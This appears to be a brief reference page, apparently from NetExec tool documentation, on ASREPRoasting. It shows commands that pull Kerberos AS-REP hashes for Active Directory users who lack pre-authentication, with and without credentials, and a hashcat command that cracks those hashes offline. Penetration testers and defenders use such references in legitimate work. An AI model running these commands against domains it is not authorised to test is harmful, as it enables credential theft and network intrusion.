ASREPRoast
Retrieve the Kerberos 5 AS-REP etype 23 hash of users without Kerberos pre-authentication required
Without authentication
nxc ldap 192.168.0.104 -u harry -p '' --asreproast output.txtnxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txtWith authentication
nxc ldap 192.168.0.104 -u harry -p pass --asreproast output.txtCracking with hashcat
hashcat -m18200 output.txt wordlistExample
Ressources
Last updated
Was this helpful?

